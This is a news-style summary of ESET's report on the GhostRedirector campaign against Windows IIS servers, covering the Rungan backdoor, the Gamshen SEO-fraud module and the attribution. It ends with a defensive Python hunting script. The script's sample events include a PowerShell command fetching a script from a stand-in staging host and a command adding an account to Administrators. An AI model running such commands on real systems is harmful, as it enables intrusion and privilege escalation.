Cybersecurity researchers have exposed a previously undocumented threat cluster named GhostRedirector that has compromised at least 65 Windows servers, focused mainly in Brazil, Thailand and Vietnam. The operation centers on a passive C++ backdoor dubbed Rungan and an IIS module codenamed Gamshen, according to a report from Slovak cybersecurity firm ESET.
Initial access is believed to be gained by exploiting a vulnerability – likely an SQL injection flaw – and is followed by the use of PowerShell to deliver additional tools hosted on a staging server. ESET noted that most unauthorized PowerShell executions originated from the binary sqlserver.exe, a finding consistent with the suspected initial-access vector.
Rungan is designed to await incoming requests from a URL matching a predefined pattern (for example, https://+:80/v1.0/8888/sys.html) and then executes the embedded commands. The backdoor supports four commands: mkuser (create a new user on the server), listfolder (retrieve information from a path), addurl (register new URLs for the backdoor to listen on), and cmd (run a command on the host using the CreateProcessA API).
Gamshen, written in C/C++, is associated with a class of IIS malware known as Group 13. The module can operate as both a backdoor and an agent for SEO fraud, intercepting HTTP requests made to sites hosted on the compromised server – specifically those from search engine crawlers – and altering responses to steer Googlebot visits toward a target site.
Researchers said GhostRedirector’s SEO fraud activity appears intended to manipulate search rankings by creating artificial backlinks from the compromised site to targeted websites, with potential use in promoting gambling-related content. While it remains unclear which destinations the manipulated backlinks redirect to, researchers warned the tactic could harm the reputation of compromised hosts.
In addition to Rungan and Gamshen, GhostRedirector dropped several other tools, including GoToHTTP (for remote access via a browser), BadPotato or EfsPotato (for creating privileged accounts in the Administrators group), and Zunput (for gathering site information and dropping web shells such as ASP, PHP and JavaScript).
The actors behind GhostRedirector are assessed with medium confidence to be China-aligned. ESET cited hard-coded Chinese strings in the source code, a code-signing certificate issued to Shenzhen Diyuan Technology Co., Ltd. to sign privilege-escalation artifacts, and the use of the password huang for a GhostRedirector-created user on a compromised server as indicators. The firm notes that this attribution is not definitive, and other China-linked threat activity has been observed in related campaigns.
The GhostRedirector campaign echoes earlier IIS-focused SEO fraud activity documented by security researchers. As with prior campaigns, the operators' primary goal appears to be long-term access and monetization through manipulated search rankings rather than attacking ordinary visitors to the compromised sites. Analysts emphasized the need for prompt patching of exposed SQL injection surfaces, monitoring for unusual PowerShell activity, and auditing for rogue user accounts and newly registered URLs on affected IIS servers.
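A hunting check for two of the behaviours this report describes (PowerShell launched by the SQL Server process, and accounts being added to the Administrators group), written as an added example over constructed Sysmon-style process-creation events; it is not code from ESET's report, and the field names, sample paths and staging URL are assumptions.

```python
import json

# Parent names: "sqlserver.exe" is the spelling the report above uses; "sqlservr.exe"
# is the standard SQL Server service binary name, so both spellings are matched.
SQL_SERVER_PARENTS = {"sqlserver.exe", "sqlservr.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (C:\\X\\a.EXE -> a.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(event: dict) -> list[str]:
    """Apply two hunting rules to one process-creation event; return findings."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    findings = []
    # Rule 1: PowerShell whose parent is the SQL Server process (the chain reported above).
    if image in POWERSHELL_IMAGES and parent in SQL_SERVER_PARENTS:
        findings.append(f"powershell spawned by {parent}")
    # Rule 2: a local account being added to the Administrators group via net.exe.
    if image in {"net.exe", "net1.exe"} and "localgroup" in cmdline \
            and "administrators" in cmdline and "/add" in cmdline:
        findings.append("account added to Administrators via net.exe")
    return findings

def scan(log_text: str) -> list[tuple[int, str]]:
    """Run check_event over JSON-lines input; return (line_no, finding) pairs."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            for finding in check_event(json.loads(line)):
                hits.append((n, finding))
    return hits

# Constructed sample events (Sysmon-style field names), not real telemetry.
SAMPLE_LOG = """\
{"Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "ParentImage": "C:\\\\Program Files\\\\Microsoft SQL Server\\\\MSSQL\\\\Binn\\\\sqlservr.exe", "CommandLine": "powershell -nop -c iwr http://staging.example/x.ps1"}
{"Image": "C:\\\\Windows\\\\System32\\\\net1.exe", "ParentImage": "C:\\\\Windows\\\\System32\\\\net.exe", "CommandLine": "net1 localgroup Administrators svc_update /add"}
{"Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "ParentImage": "C:\\\\Windows\\\\explorer.exe", "CommandLine": "powershell Get-Process"}
"""

if __name__ == "__main__":
    for line_no, finding in scan(SAMPLE_LOG):
        print(f"line {line_no}: {finding}")
```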